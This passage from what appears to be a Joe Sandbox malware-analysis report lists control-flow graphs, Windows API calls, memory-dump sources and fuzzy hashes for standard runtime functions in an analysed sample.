                                                                              • Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd
                                                                              Similarity
                                                                              • API ID: CreateFile
                                                                              • String ID: 'C
                                                                              • API String ID: 823142352-1213274369
                                                                              • Opcode ID: 3e3bbcbd9e405c7ad166458f9bb05aafc7eee938bdd399e0c80ef91d082bca67
                                                                              • Instruction ID: da0812e263b75e99e1d32ae1a8edf8fae9bd009790050dae2bf42c3606203dd1
                                                                              • Opcode Fuzzy Hash: 3e3bbcbd9e405c7ad166458f9bb05aafc7eee938bdd399e0c80ef91d082bca67
                                                                              • Instruction Fuzzy Hash: 2BD06C3211010DBFDF029F85DD06EDA3BAAFB88754F014000BA1866020CB32E821EB94

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 489 ee70f5-ee7117 490 ee711d-ee711f 489->490 491 ee730a 489->491 493 ee714b-ee716e 490->493 494 ee7121-ee7140 call ee11a0 490->494 492 ee730c-ee7310 491->492 495 ee7174-ee717a 493->495 496 ee7170-ee7172 493->496 502 ee7143-ee7146 494->502 495->494 498 ee717c-ee718d 495->498 496->495 496->498 500 ee718f-ee719d call eea3be 498->500 501 ee71a0-ee71b0 call ee6c3a 498->501 500->501 507 ee71f9-ee720b 501->507 508 ee71b2-ee71b8 501->508 502->492 509 ee720d-ee7213 507->509 510 ee7262-ee7282 WriteFile 507->510 511 ee71ba-ee71bd 508->511 512 ee71e1-ee71f7 call ee680b 508->512 516 ee724e-ee7260 call ee6cb7 509->516 517 ee7215-ee7218 509->517 513 ee728d 510->513 514 ee7284-ee728a GetLastError 510->514 518 ee71bf-ee71c2 511->518 519 ee71c8-ee71d7 call ee6bd2 511->519 527 ee71da-ee71dc 512->527 521 ee7290-ee729b 513->521 514->513 535 ee7235-ee7238 516->535 522 ee723a-ee724c call ee6e7b 517->522 523 ee721a-ee721d 517->523 518->519 524 ee72a2-ee72a5 518->524 519->527 528 ee729d-ee72a0 521->528 529 ee7305-ee7308 521->529 522->535 530 ee72a8-ee72aa 523->530 531 ee7223-ee7230 call ee6d92 523->531 524->530 527->521 528->524 529->492 536 ee72ac-ee72b1 530->536 537 ee72d8-ee72e4 530->537 531->535 535->527 540 ee72ca-ee72d3 call ee1db1 536->540 541 ee72b3-ee72c5 536->541 542 ee72ee-ee7300 537->542 543 ee72e6-ee72ec 537->543 540->502 541->502 542->502 543->491 543->542
                                                                              APIs
                                                                                • Part of subcall function 00EE680B: GetConsoleOutputCP.KERNEL32(9B965E69,00000000,00000000,?), ref: 00EE686E
                                                                              • WriteFile.KERNELBASE(?,00000000,00EE0F0F,?,00000000,00000000,00000000,?,00000000,?,00ED96B4,00EE0F0F,00000000,00ED96B4,?,?), ref: 00EE727A
                                                                              • GetLastError.KERNEL32(?,00EE0F0F,00000000,?,00ED96B4,?,00000000,00000000), ref: 00EE7284
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                              • Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd
                                                                              Similarity
                                                                              • API ID: ConsoleErrorFileLastOutputWrite
                                                                              • String ID:
                                                                              • API String ID: 2915228174-0
                                                                              • Opcode ID: c50cd77f35487f702d5b33e4f40e2afaf6f158e042a91c5bb2dab8816e4cc804
                                                                              • Instruction ID: 7d54fdedd7762829c639e3b435b0fcbce7ae9e905e692022a93906a4b3f63c20
                                                                              • Opcode Fuzzy Hash: c50cd77f35487f702d5b33e4f40e2afaf6f158e042a91c5bb2dab8816e4cc804
                                                                              • Instruction Fuzzy Hash: 9061B0B190829DAFDF11DFAAC844AEEBBB9AF19308F141185F980B7255D731D901DB60

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 546 ee65b0-ee65b5 547 ee65b7-ee65cf 546->547 548 ee65dd-ee65e6 547->548 549 ee65d1-ee65d5 547->549 551 ee65f8 548->551 552 ee65e8-ee65eb 548->552 549->548 550 ee65d7-ee65db 549->550 553 ee6652-ee6656 550->553 556 ee65fa-ee6607 GetStdHandle 551->556 554 ee65ed-ee65f2 552->554 555 ee65f4-ee65f6 552->555 553->547 557 ee665c-ee665f 553->557 554->556 555->556 558 ee6609-ee660b 556->558 559 ee6634-ee6646 556->559 558->559 561 ee660d-ee6616 GetFileType 558->561 559->553 560 ee6648-ee664b 559->560 560->553 561->559 562 ee6618-ee6621 561->562 563 ee6629-ee662c 562->563 564 ee6623-ee6627 562->564 563->553 565 ee662e-ee6632 563->565 564->553 565->553
                                                                              APIs
                                                                              • GetStdHandle.KERNEL32(000000F6), ref: 00EE65FC
                                                                              • GetFileType.KERNELBASE(00000000), ref: 00EE660E
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                              • Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd
                                                                              Similarity
                                                                              • API ID: FileHandleType
                                                                              • String ID:
                                                                              • API String ID: 3000768030-0
                                                                              • Opcode ID: 6fa354799426c2af28073a2bbbc361eadfc821fd6237303d73294c5ec94e6e56
                                                                              • Instruction ID: efe683966f2c04d5e9a861463227ddbfeae324ffbc217b0f36b9f1fbe5548891
                                                                              • Opcode Fuzzy Hash: 6fa354799426c2af28073a2bbbc361eadfc821fd6237303d73294c5ec94e6e56
                                                                              • Instruction Fuzzy Hash: B8119A71214BD646C7304F3F8C98522BA94A7B63B8B381B2ED0B7A75F5CB30D94AD641

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 566 eea29d-eea2b5 call eef3b6 569 eea2cb-eea2e1 SetFilePointerEx 566->569 570 eea2b7-eea2be 566->570 572 eea2f6-eea300 569->572 573 eea2e3-eea2f4 GetLastError call ee1db1 569->573 571 eea2c5-eea2c9 570->571 574 eea31c-eea31f 571->574 572->571 576 eea302-eea317 572->576 573->571 576->574
                                                                              APIs
                                                                              • SetFilePointerEx.KERNELBASE(00000000,00000000,00F057D8,00ED96B4,00000002,00ED96B4,00000000,?,?,?,00EEA3A7,00000000,?,00ED96B4,00000002,00F057D8), ref: 00EEA2D9
                                                                              • GetLastError.KERNEL32(00ED96B4,?,?,?,00EEA3A7,00000000,?,00ED96B4,00000002,00F057D8,00000000,00ED96B4,00000000,00F057D8,0000000C,00EE0FE6), ref: 00EEA2E6
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                              • Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorFileLastPointer
                                                                              • String ID:
                                                                              • API String ID: 2976181284-0
                                                                              • Opcode ID: bae9cd6590efa325e5d70be5ab9230d0e2af9427c8f0853173c9b16b53901bc1
                                                                              • Instruction ID: b73cf00109ba6d12fe9e690c0b80eebec4e6bbfcda4025e1030d743ce2946779
                                                                              • Opcode Fuzzy Hash: bae9cd6590efa325e5d70be5ab9230d0e2af9427c8f0853173c9b16b53901bc1
                                                                              • Instruction Fuzzy Hash: E5014E32600559AFCB058F56DC05DDE3F69EB85330B280258F901B72A1EE71ED41CB90

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 578 ee7311-ee731a 579 ee731c-ee732f RtlFreeHeap 578->579 580 ee7349-ee734a 578->580 579->580 581 ee7331-ee7348 GetLastError call ee1d4b call ee1de8 579->581 581->580
                                                                              APIs
                                                                              • RtlFreeHeap.NTDLL(00000000,00000000,?,00EEFB34,00EDDD01,00000000,00EDDD01,?,00EEFDD5,00EDDD01,00000007,00EDDD01,?,00EF02C9,00EDDD01,00EDDD01), ref: 00EE7327
                                                                              • GetLastError.KERNEL32(00EDDD01,?,00EEFB34,00EDDD01,00000000,00EDDD01,?,00EEFDD5,00EDDD01,00000007,00EDDD01,?,00EF02C9,00EDDD01,00EDDD01), ref: 00EE7332
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                              • Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorFreeHeapLast
                                                                              • String ID:
                                                                              • API String ID: 485612231-0
                                                                              • Opcode ID: a8fa78ca2051836dd17c06c7fdeb626d2fb77717f9700b796b2b1e4f94532494
                                                                              • Instruction ID: b9ef9d2feb61f5755b6af3ca6f5f284be49fe4e5554a6bfeebce69bc88cbd449
                                                                              • Opcode Fuzzy Hash: a8fa78ca2051836dd17c06c7fdeb626d2fb77717f9700b796b2b1e4f94532494
                                                                              • Instruction Fuzzy Hash: A7E0C23250424CABCF612FE2EC09B993FA9AF40796F105060FA08FA0B0DE3088D5D7C0
                                                                              APIs
                                                                                • Part of subcall function 00ED6330: std::ios_base::clear.LIBCPMTD ref: 00ED6361
                                                                              • fpos.LIBCPMTD ref: 00ED389A
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                              • Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd
                                                                              Similarity
                                                                              • API ID: fposstd::ios_base::clear
                                                                              • String ID:
                                                                              • API String ID: 1508181384-0
                                                                              • Opcode ID: f50348f78d37e3508cedee8f669624e2ad31b087f787502b8019bf2b28877518
                                                                              • Instruction ID: 017a1a6df77d7023f3d885438c3f7cd0bb5cc306811cdf7c5db3de59f3cf8de6
                                                                              • Opcode Fuzzy Hash: f50348f78d37e3508cedee8f669624e2ad31b087f787502b8019bf2b28877518
                                                                              • Instruction Fuzzy Hash: D2311DB5A006199FCB04DFA4C991BBEB7B1FF88710F108619E5257B391CB31A901CB90
                                                                              APIs
                                                                              • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 00ED4B8A
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                              • Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd
                                                                              Similarity
                                                                              • API ID: ProcessorVirtual$Concurrency::RootRoot::
                                                                              • String ID:
                                                                              • API String ID: 3936482309-0
                                                                              • Opcode ID: 691c63f11937bc60e3da1d556036812ff35f9fd7d50910e0ee82f1fa42e7805d
                                                                              • Instruction ID: 14fc361dd3ef566bf35296fb3f686e2335101f09ed599b817981c4c0cb59bf03
                                                                              • Opcode Fuzzy Hash: 691c63f11937bc60e3da1d556036812ff35f9fd7d50910e0ee82f1fa42e7805d
                                                                              • Instruction Fuzzy Hash: 3B312BB4A0021A9FDB04DF98C991BAEB7B1FF89704F108659E9167B381C771A901CB91
                                                                              APIs
                                                                              • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 00ED365A
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                              • Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd
                                                                              Similarity
                                                                              • API ID: ProcessorVirtual$Concurrency::RootRoot::
                                                                              • String ID:
                                                                              • API String ID: 3936482309-0
                                                                              • Opcode ID: df22f475bc3cb3fbc7395f9acc0a20f8ed354dd32a9ed6a550bc51785ceaa355
                                                                              • Instruction ID: ac82b5b2b4466d2b6596fdc3c6823024b6580e40a985ca323c5e76762102d435
                                                                              • Opcode Fuzzy Hash: df22f475bc3cb3fbc7395f9acc0a20f8ed354dd32a9ed6a550bc51785ceaa355
                                                                              • Instruction Fuzzy Hash: 00312DB4A0021ADFDB04DF98C991BBFB7B2FF89704F108659E5166B392C771A901CB91
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                              • Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd
                                                                              Similarity
                                                                              • API ID: __wsopen_s
                                                                              • String ID:
                                                                              • API String ID: 3347428461-0
                                                                              • Opcode ID: a681453d6941c669fdd643c6cda93c42f2b4fd86118f5cb583ad69dce55ae5f3
                                                                              • Instruction ID: 3a98dfcd1cf44be7b5e8b2f8e94160c8128a945f8836a80369164b910bdd48fb
                                                                              • Opcode Fuzzy Hash: a681453d6941c669fdd643c6cda93c42f2b4fd86118f5cb583ad69dce55ae5f3
                                                                              • Instruction Fuzzy Hash: 51111571A0420AAFCB05DF59E941A9B7BF5EF48308F1540A9F809AB251E631EE11CB65
                                                                              APIs
                                                                              • stdext::threads::lock_error::lock_error.LIBCPMTD ref: 00EDA2F3
                                                                                • Part of subcall function 00EDB0A3: RaiseException.KERNEL32(E06D7363,00000001,00000003,00ED141C,?,?,?,00ED141C,?,00F05DBC), ref: 00EDB103
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                              • Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd
                                                                              Similarity
                                                                              • API ID: ExceptionRaisestdext::threads::lock_error::lock_error
                                                                              • String ID:
                                                                              • API String ID: 3447279179-0
                                                                              • Opcode ID: 77a7d9749c74cb82edae29d4ed8423bd5db84b69eb0197b46e040aa535c7a0a6
                                                                              • Instruction ID: 0d1432829c5196af35a8f48f25efc84d35f13ee3623153dfc495b59491b2030d
                                                                              • Opcode Fuzzy Hash: 77a7d9749c74cb82edae29d4ed8423bd5db84b69eb0197b46e040aa535c7a0a6
                                                                              • Instruction Fuzzy Hash: 7EF0243880060CF6CB00BAB5EC0ADDEB3ECDA00310B601123B924B56E2EB70D64685D2
                                                                              APIs
                                                                              • allocator.LIBCONCRTD ref: 00ED88C5
                                                                                • Part of subcall function 00ED89D0: _Allocate.LIBCONCRTD ref: 00ED89E4
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                              • Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd
                                                                              Similarity
                                                                              • API ID: Allocateallocator
                                                                              • String ID:
                                                                              • API String ID: 40054573-0
                                                                              • Opcode ID: 6e45e69e3226e455510d1fc968e43a19ec70c87ca408ccc417ab80709b3d44ea
                                                                              • Instruction ID: 3f515d26141e4f2e5fefb50cf12595205c1d58ffc48a5346158012d90d3701d9
                                                                              • Opcode Fuzzy Hash: 6e45e69e3226e455510d1fc968e43a19ec70c87ca408ccc417ab80709b3d44ea
                                                                              • Instruction Fuzzy Hash: 610184B4E00209EFCB04DF98D5919AEBBF1EF89304F2081A9E809A7355D730AA51CB94
                                                                              APIs
                                                                              • RtlAllocateHeap.NTDLL(00000000,00EEE6D6,00000000,?,00EEE6D6,00000220,?,?,00000000), ref: 00EE8280
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                              • Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd
                                                                              Similarity
                                                                              • API ID: AllocateHeap
                                                                              • String ID:
                                                                              • API String ID: 1279760036-0
                                                                              • Opcode ID: b14451340d68ef9ec4710c8cb5105b9cafb58307e1b31b734b65223d0c4f13bb
                                                                              • Instruction ID: 185481163ba111f81a441155c2a79505015d8a99ea57a149197e5ebc86459890
                                                                              • Opcode Fuzzy Hash: b14451340d68ef9ec4710c8cb5105b9cafb58307e1b31b734b65223d0c4f13bb
                                                                              • Instruction Fuzzy Hash: 58E0E531601A9D6ADF7026A75E00B9B3B8C9F4A3A0F192211EE48B20F1CF20CC0082E0
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                              • Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd
                                                                              Similarity
                                                                              • API ID: __floor_pentium4
                                                                              • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                              • API String ID: 4168288129-2761157908
                                                                              • Opcode ID: d6dc0bfc17699d8a8f8ceac9c902e15f85897c5a85cfe5a3b074950e63bcf790
                                                                              • Instruction ID: bc020001171c49ee3dc16bd5b500bf37613e218b8a4c7c39d4fbe44694040f05
                                                                              • Opcode Fuzzy Hash: d6dc0bfc17699d8a8f8ceac9c902e15f85897c5a85cfe5a3b074950e63bcf790
                                                                              • Instruction Fuzzy Hash: 8CD20672E0862D8BDB65CE28CD407EAB7B5EB44305F1451EAD60DF7240EB78AE858F41
                                                                              APIs
                                                                              • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002), ref: 00EF1378
                                                                              • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002), ref: 00EF13A1
                                                                              • GetACP.KERNEL32 ref: 00EF13B6
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                              • Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd
                                                                              Similarity
                                                                              • API ID: InfoLocale
                                                                              • String ID: ACP$OCP
                                                                              • API String ID: 2299586839-711371036
                                                                              • Opcode ID: bf386d89757db9f23f63fc33c3fd930ad7d19252b3eb8288fd18edb4d6dea5a2
                                                                              • Instruction ID: 86817e0e347d5ca2e4d432176270cb73c5281fa2fa0742995c9c9a82121af271
                                                                              • Opcode Fuzzy Hash: bf386d89757db9f23f63fc33c3fd930ad7d19252b3eb8288fd18edb4d6dea5a2
                                                                              • Instruction Fuzzy Hash: DD21922270210DEADB349B14C901ABB73A7AB94B58B5755A4EB0AF7900F732DD41C350
                                                                              APIs
                                                                                • Part of subcall function 00EE620F: GetLastError.KERNEL32(00000000,?,00EEB816), ref: 00EE6213
                                                                                • Part of subcall function 00EE620F: SetLastError.KERNEL32(00000000,00000000,?,00000006,000000FF), ref: 00EE62B5
                                                                              • GetUserDefaultLCID.KERNEL32 ref: 00EF15C3
                                                                              • IsValidCodePage.KERNEL32(00000000), ref: 00EF1601
                                                                              • IsValidLocale.KERNEL32(?,00000001), ref: 00EF1614
                                                                              • GetLocaleInfoW.KERNEL32(?,00001001,?,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 00EF165C
                                                                              • GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 00EF1677
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                              • Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd
                                                                              Similarity
                                                                              • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                              • String ID:
                                                                              • API String ID: 415426439-0
                                                                              • Opcode ID: 757fca77b1e5bcfa4361e1f6d848c6b1308737ca17a2da7f29a0e796c7823164
                                                                              • Instruction ID: 6f7a5aa8584e258b59f96a6af8953eb14fb4c1976c6a06a3df22287ca72c9df8
                                                                              • Opcode Fuzzy Hash: 757fca77b1e5bcfa4361e1f6d848c6b1308737ca17a2da7f29a0e796c7823164
                                                                              • Instruction Fuzzy Hash: 46516A72A0020DEFDF10EFA5CC41ABA77F8AF48704F1955A9EA15FB190EB709904CB61
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                              • Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 31a0e38ba20bd8e180b811d2703fbebb8ddc6f9a9a33c4cff84b8e53218f21aa
                                                                              • Instruction ID: 9ce3e7db8518830a457646461a9cb964b7b9724431eccaa2d3095cd665ebdbae
                                                                              • Opcode Fuzzy Hash: 31a0e38ba20bd8e180b811d2703fbebb8ddc6f9a9a33c4cff84b8e53218f21aa
                                                                              • Instruction Fuzzy Hash: 45022A71E012599BDF14CFA9C8806AEBBF5FF48314F24926DE619B7380D771AA41CB90
                                                                              APIs
                                                                              • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000), ref: 00EEDFD2
                                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 00EEE0C6
                                                                              • FindClose.KERNEL32(00000000), ref: 00EEE105
                                                                              • FindClose.KERNEL32(00000000), ref: 00EEE138
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                              • Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
